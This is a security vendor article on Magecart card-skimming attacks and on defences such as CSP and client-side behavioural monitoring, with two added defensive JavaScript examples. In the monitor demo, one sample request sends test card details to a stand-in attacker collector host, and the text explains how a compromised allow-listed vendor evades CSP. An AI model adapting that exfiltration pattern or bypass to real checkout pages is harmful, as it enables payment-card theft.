The Magecart digital skimming groups take their name from Magento, the open source e-commerce platform. Most of the online digital skimming attacks undertaken by the so-called “Magecart gangs” have targeted Magento, whose installed base still includes many sites running older, unpatched versions.
But Magecart is now much bigger than Magento. In December 2020, researchers identified a new, more technologically advanced Magecart skimmer. Designed, like other Magecart attacks, to extract credit card information from web applications, this one could attack many popular e-commerce platforms and content management systems (CMS), including Magento, WordPress, Drupal, Shopify, BigCommerce, Salesforce Commerce Cloud and WooCommerce.
A scourge in the digital age
The emergence of this versatile skimmer is one of many indicators that the Magecart gangs are expanding their digital skimming efforts to a wider range of platforms. In May 2021, for example, Magecart gangs were identified as the source of a new variant of digital skimmer, called MobileInter, that targets mobile browsers and mobile websites. MobileInter detects mobile users across a wide variety of browsers.
Since its appearance in 2015, Magecart has become a general label for a wide range of digital skimming attacks on web and mobile applications. Skimming was previously associated with point-of-sale (POS) terminals, where the skimmer might be a physical device or a compromised POS system; over the past five years it has quickly moved to the internet and e-commerce platforms. Today, most skimming of personal and financial information happens on the web and in mobile apps during card-not-present transactions.
Often, Magecart skimmers operate for months without the site operators or their security teams being aware of the hack. Because Magecart changes application behavior in subtle ways, and only on the client side, operators have no easy way to observe the hard-to-detect changes in what a user sees. Magecart attacks have successfully compromised thousands of web and mobile applications. The victims include dozens of global brands, such as British Airways and Macy’s. The annual cost of Magecart attacks to online merchants and other operators is difficult to calculate precisely, because these attacks are counted together with other financial attacks, but the tally runs to billions of dollars per year in losses, remediation costs and reputational damage. British Airways, for example, paid a fine of £20 million for failing to protect its customers from a Magecart attack.
How Magecart is evolving beyond Magento
Magecart attackers have also recognized that third-party plugins and add-ons provide efficient paths to compromising other platforms. Magecart gangs insert code into the plugins’ source code repositories or into the processes that package and deliver them. Because a plugin changes little from one e-commerce platform to another, Magecart’s attack code tends to work against the same plugin on every platform. Known as a “supply chain attack,” this style of compromise is favored by the more sophisticated gangs and is even more dangerous because it delivers its payload through a trusted third party. Site operators may have no visibility into the compromised code at all; they can identify the anomaly only by spotting the changes their clients are experiencing.
How to fight against scalable attacks
More basic cybersecurity tools such as web application firewalls (WAFs) do little or nothing against Magecart attacks: a WAF inspects inbound requests to the server, but a skimmer runs in the user’s browser, where the WAF never sees it. Some security teams run static analysis on their web application code to identify changes and anomalies. Magecart attacks evade this by hiding skimmer code in dynamically served third-party content (skimmers have even been hidden inside favicon image files). A more effective approach is a content security policy (CSP) that restricts which sources the page may load scripts from and where it may send data, so that application code cannot perform unwanted behavior. CSPs require extensive tuning, however, and are not sufficient on their own: they do nothing against, for example, the compromise of a trusted, allow-listed domain that then injects a skimmer into the application code.
CSP works by controlling which origins the page may load resources from and which origins it may connect to, according to the policy the site operator declares. This is ineffective when the attack vector is an allow-listed domain (Google or another large software vendor, for example). And the restrictions themselves cause site failures whenever developers add a new resource and forget to update the CSP.
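To make the two CSP points concrete (what a tightened policy blocks, and what it cannot block), here is an added example that is not code from the original article or from PerimeterX. It is a deliberately small evaluator for the two directives that decide whether a skimmer can run (script-src) and phone home (connect-src). All policies, host names and URLs are constructed for illustration; the supply-chain scenario assumes the compromised analytics vendor appears in both script-src and connect-src, which is typical for analytics tags and is exactly what lets the exfiltration through.

```javascript
// Added example, not from the article: a minimal CSP evaluator for script-src
// and connect-src. Simplifications: no nonces or hashes, no path matching,
// no 'strict-dynamic'. Hosts, URLs and policies below are constructed.

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Does one source expression ('self', https:, https://host, *.host) match url?
function sourceMatches(source, url, pageOrigin) {
  const u = new URL(url);
  if (source === "'self'") return u.origin === pageOrigin;
  if (source.startsWith("'")) return false; // 'none', 'unsafe-inline', ... never match a URL
  if (source === '*') return u.protocol === 'https:' || u.protocol === 'http:';
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return u.protocol === source.toLowerCase();
  let host = source;
  const m = source.match(/^([a-z][a-z0-9+.-]*):\/\/(.*)$/i);
  if (m) {
    if (u.protocol !== m[1].toLowerCase() + ':') return false;
    host = m[2];
  }
  host = host.split('/')[0].split(':')[0].toLowerCase(); // drop path and port
  if (host.startsWith('*.')) return u.hostname.endsWith(host.slice(1)); // subdomains only
  return u.hostname === host;
}

function allows(policy, directive, url, pageOrigin) {
  const sources = policy[directive] !== undefined ? policy[directive] : policy['default-src'];
  if (sources === undefined) return true; // neither directive set: CSP does not restrict it
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// A skimmer needs its script to load and an outbound channel for the stolen data.
function skimmerOutcome(header, scriptUrl, exfilUrl, pageOrigin) {
  const policy = parseCsp(header);
  return {
    scriptLoads: allows(policy, 'script-src', scriptUrl, pageOrigin),
    exfilAllowed: allows(policy, 'connect-src', exfilUrl, pageOrigin),
  };
}

const PAGE_ORIGIN = 'https://shop.example';

// Weak policy (constructed): any https script may run, fetch/XHR may go anywhere.
const LOOSE_CSP = "default-src 'self'; script-src 'self' https: 'unsafe-inline'; connect-src *";

// Tightened policy (constructed): the page itself, its payment provider and one
// analytics vendor, each listed only for what it needs.
const TIGHT_CSP = "default-src 'self'; " +
  "script-src 'self' https://cdn.payments.example https://tag.analytics.example; " +
  "connect-src 'self' https://api.payments.example https://collect.analytics.example";

// Hypothetical attacker infrastructure.
const SKIMMER_JS = 'https://evil-analytics.example/s.js';
const SKIMMER_EXFIL = 'https://evil-analytics.example/collect';

function scenarios() {
  return {
    // 1. Skimmer injected into the page but hosted on the attacker's own domain.
    looseVsAttackerHost: skimmerOutcome(LOOSE_CSP, SKIMMER_JS, SKIMMER_EXFIL, PAGE_ORIGIN),
    tightVsAttackerHost: skimmerOutcome(TIGHT_CSP, SKIMMER_JS, SKIMMER_EXFIL, PAGE_ORIGIN),
    // 2. Supply-chain case: the allow-listed analytics vendor is compromised, its tag
    //    now carries the skimmer and posts card data to the vendor's own collector,
    //    which the policy also allows. CSP cannot tell this from normal use.
    tightVsCompromisedVendor: skimmerOutcome(TIGHT_CSP,
      'https://tag.analytics.example/tag.js', 'https://collect.analytics.example/beacon', PAGE_ORIGIN),
    // 3. Operational cost: a legitimate new vendor added without updating the policy
    //    is blocked, which is how CSP rollouts break checkout pages.
    tightVsNewVendor: allows(parseCsp(TIGHT_CSP), 'script-src',
      'https://cdn.newvendor.example/widget.js', PAGE_ORIGIN),
  };
}

console.log(scenarios());
```

The loose policy lets the attacker-hosted skimmer both load and exfiltrate; the tightened policy blocks both. In the compromised-vendor scenario the tightened policy passes both checks, because the policy can only express trust in an origin, not in what that origin serves today. Scenario 3 shows the other side of the trade-off: the same strictness blocks any legitimately added resource until someone edits the policy.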
To properly guard against all types of Magecart attacks, security teams and site operators should look for solutions that continuously analyze application behavior in the browser (client-side security monitoring) to identify the small anomalies that may indicate the presence of a skimmer. Because all skimmers share the same goal, they tend to behave similarly: they read payment fields and send the data somewhere the page does not normally send it. Machine learning (ML) is a suitable tool for studying skimming behavior and legitimate behavior across large web applications over billions of interactions.
Using this information, ML models can recognize common patterns of Magecart behavior and detect when an application deviates, even slightly, from its expected behavior. By analyzing application behavior in real time and comparing it with past behavior, retailers can identify Magecart attacks as they happen and alert site operators to the problem. As Magecart evolves and expands its target list, knowing the enemy and countering it in real time is the best defense against threats, known and unknown.
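The following is an added example, not code from the article or from PerimeterX, of the simplest form of the client-side behavioral monitoring described above. It does not learn a baseline itself; you hand it the origins a checkout page legitimately talks to, and it wraps the browser APIs skimmers use to send data (fetch, XMLHttpRequest, navigator.sendBeacon) so that any request leaving that baseline is flagged, most loudly when the URL or body carries a Luhn-valid card number. The origins, URLs and request bodies are constructed for illustration, and the window-like object is a hypothetical stand-in so the code runs outside a browser.

```javascript
// Added example, not from the article: a small client-side exfiltration monitor.
// Baseline origins, sample requests and the fake window below are constructed.

// Luhn check, so a run of digits is only treated as a card number if it could be one.
function luhnValid(digits) {
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    double = !double;
  }
  return digits.length >= 13 && sum % 10 === 0;
}

// 13 to 19 digits, optionally separated by spaces or dashes, that pass Luhn.
function containsCardNumber(text) {
  const re = /\b(?:\d[ -]?){12,18}\d\b/g;
  for (const m of text.match(re) || []) {
    if (luhnValid(m.replace(/[ -]/g, ''))) return true;
  }
  return false;
}

function createMonitor(baselineOrigins, pageOrigin) {
  const baseline = new Set(baselineOrigins);
  const alerts = [];
  function inspect(channel, url, body) {
    let origin;
    try { origin = new URL(String(url), pageOrigin).origin; } catch (e) { origin = 'invalid'; }
    // Card data may ride in the URL (image/GET beacons) or in the body.
    const text = `${url} ${body == null ? '' : String(body)}`;
    const offBaseline = !baseline.has(origin);
    const cardData = containsCardNumber(text);
    const severity = offBaseline && cardData ? 'high' : offBaseline ? 'medium' : 'none';
    const verdict = { channel, origin, offBaseline, cardData, severity };
    if (severity !== 'none') alerts.push(verdict);
    return verdict;
  }
  return { inspect, alerts };
}

// Wrap the APIs skimmers use to send data. `win` is any window-like object, so
// the same code runs against a fake here and against `window` in a real page.
// Requests are observed, not blocked, so legitimate traffic is never broken.
function installHooks(win, monitor) {
  if (typeof win.fetch === 'function') {
    const origFetch = win.fetch;
    win.fetch = function (input, init) {
      monitor.inspect('fetch', typeof input === 'string' ? input : input.url, init && init.body);
      return origFetch.apply(this, arguments);
    };
  }
  if (win.navigator && typeof win.navigator.sendBeacon === 'function') {
    const origBeacon = win.navigator.sendBeacon;
    win.navigator.sendBeacon = function (url, data) {
      monitor.inspect('sendBeacon', url, data);
      return origBeacon.apply(this, arguments);
    };
  }
  if (win.XMLHttpRequest) {
    const proto = win.XMLHttpRequest.prototype;
    const origOpen = proto.open;
    const origSend = proto.send;
    proto.open = function (method, url) {
      this.__monitoredUrl = url; // remembered for send()
      return origOpen.apply(this, arguments);
    };
    proto.send = function (body) {
      monitor.inspect('xhr', this.__monitoredUrl, body);
      return origSend.apply(this, arguments);
    };
  }
}

// Stand-alone run against a fake window: one normal payment call, one skimmer
// exfiltration to an unknown origin, one unknown beacon without card data.
function demoRun() {
  const pageOrigin = 'https://shop.example';
  const monitor = createMonitor([pageOrigin, 'https://api.payments.example'], pageOrigin);
  const sent = [];
  const fakeWindow = {
    fetch(url, init) { sent.push(url); return Promise.resolve({ ok: true }); },
    navigator: { sendBeacon(url, data) { sent.push(url); return true; } },
  };
  installHooks(fakeWindow, monitor);
  fakeWindow.fetch('https://api.payments.example/charge',
    { method: 'POST', body: 'cc=4111111111111111&exp=12/26' });
  fakeWindow.fetch('https://evil-analytics.example/collect',
    { method: 'POST', body: 'cc=4111111111111111&exp=12/26&cvv=123' });
  fakeWindow.navigator.sendBeacon('https://cdn.unknown.example/ping', 'session=abc');
  return { alerts: monitor.alerts, sent };
}

console.log(demoRun().alerts);
```

Real skimmers usually encode or encrypt the stolen fields before sending them, so the card-number check is a bonus signal rather than the main one; the destination leaving the baseline is the anomaly that the approach described above relies on, and it is also what a learned baseline (rather than the hand-written list used here) would supply at scale. Because the hooks only observe and pass every request through, they can be deployed in report-only fashion before anyone decides what to block.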
PerimeterX provides security services for websites and mobile applications.